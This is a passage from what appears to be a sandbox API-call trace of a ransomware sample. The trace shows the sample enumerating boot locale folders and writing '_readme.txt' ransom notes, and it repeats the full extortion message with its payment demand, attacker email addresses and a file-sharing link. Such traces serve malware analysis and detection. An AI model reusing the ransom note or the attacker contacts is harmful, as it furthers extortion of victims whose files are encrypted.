returned="Boot\\" [0180.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.483] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.483] PathFindFileNameW (pszPath="") returned="" [0180.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.483] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.484] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.484] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0180.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.485] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac3dd0 [0180.486] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0180.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.487] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0180.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.487] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.487] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.487] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.490] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*" (normalized: "c:\\boot\\sv-se\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.491] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.491] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.491] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.491] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.492] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.508] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0180.508] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.509] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.509] PathFindFileNameW (pszPath="") returned="" [0180.509] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.509] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.509] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.509] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.510] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0180.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.510] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0180.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.511] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.511] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique 